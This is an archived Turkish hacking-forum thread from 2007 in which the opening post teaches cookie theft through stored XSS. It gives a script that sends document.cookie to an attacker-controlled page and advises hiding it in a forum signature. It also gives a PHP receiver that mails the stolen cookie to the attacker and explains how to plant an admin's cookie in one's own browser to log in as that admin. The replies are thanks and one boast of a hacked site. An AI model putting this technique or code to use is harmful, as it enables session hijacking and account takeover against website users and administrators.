PDA

Orijinalini görmek için tıklayınız

eXTReMe Tracker
: Cookie Calma İle Web Hack


Godlin€
06-10-2007, 04:24 AM
Bu dökümanda size XSS ile bir hack yöntemi anlatacağım öncelikle işin mantığına değinmek istiyorum. Küçük bir javascript koduyla, kodun bulunduğu mevcut sayfaya ait cookie’yi çalabiliyoruz. Peki bu bizim ne işimize yarayacak? Ekleyeceğimiz bir php mail yollama koduyla elde edilen cookie değeri belirttiğimiz maile yollanabilir. Böylece o cookie değerini bizim o mevcut site uzerinde sahip olduğumuz cookie ile değiştirebiliriz. Yani eğer adminin cookie’yi çalarsak ve o sitedeki kendi cookiemiz ile değiştirirsek. Siteyi açtığımız an admin olarak giriş yapmış oluruz.



Buradaki sorun ise sadece mevcut sayfanın cookie değerini alabilmesi, yani color=#ffcc66Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. uzerinde bu kodu yazabilmemiz lazım. Imzasında veya herhangi bir yerinde html kodu serbest olan forumda aşşağıdaki kodu giriyoruz:



<script>window.navigate("Sitedeki Linkleri Sadece Üyelerimiz Görebilir.."+document.cookie)</script>

Not: Bu kodu başka bir şeyin arkasına gizleyebilirsiniz, örneğin imzanızda html sayesinde kayan yazı koyarsınız ama arka planda bu kodda bulunur.

Bu html kodu, kodun mevcut olduğu sayfayı açanların cookie değerlerini cookieyolla.php uzerinden bize yollamaktadır. Cookie yolla.php çok basit bir php kodudur, "data" değerini "cookieyolla.php" üzerinden maille atar "+document.cookie ise cookie yi çalan javascript kodudur. Işin mantığı bu.

Cookieyolla.php kodu:

<?

$cookie = $_GET[’data’];

$kime = "Microsoft@mailserverı.com";

$konu = "cookie";

mail ($kime,$konu,$cookie);

?>



Not: cookieyolla.php’yi kendiniz değiştirebilirsiniz, yaratıcılığınıza bağlı.

Gencay @mailserverı.com yerine cookie değerini yollamasını istediğiniz maili(yani kendi mailinizi yazın)

Cookie elimize geldiği zaman "Bilgisayarım/C/DocumentsandSettings/Kullanıcıadı/Cookies" klasörü içindeki html kodunu soktuğunuz sitenin adının bulunduğu txt dosyasındaki cookie ile değiştirin böylece gelen cookie ile giriş yapmış olursunuz.

Eksi sözlük’ün hacklenmesinde kullanılan yöntem böyle siz bunu geliştirebilirsinizde.
Eğer verildi ise kusura bakmayın.....

Slytherin
06-10-2007, 04:25 AM
Sagol Arkadasım Paylasımın icin..

darkbull666
11-29-2007, 10:35 PM
ARKADASLAR BEN ANLAMADIM BU ISI YAFF :D :P

infiltrat0r
11-29-2007, 10:44 PM
Gayet güzel anlatmışsın arkadaşım.Saolasın.

seviy0rum
12-03-2007, 10:51 PM
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) HACKEDD
tek sizmi yapıyonuz heyki :D

NoEXİT
12-03-2007, 10:54 PM
Biraz karışık sadece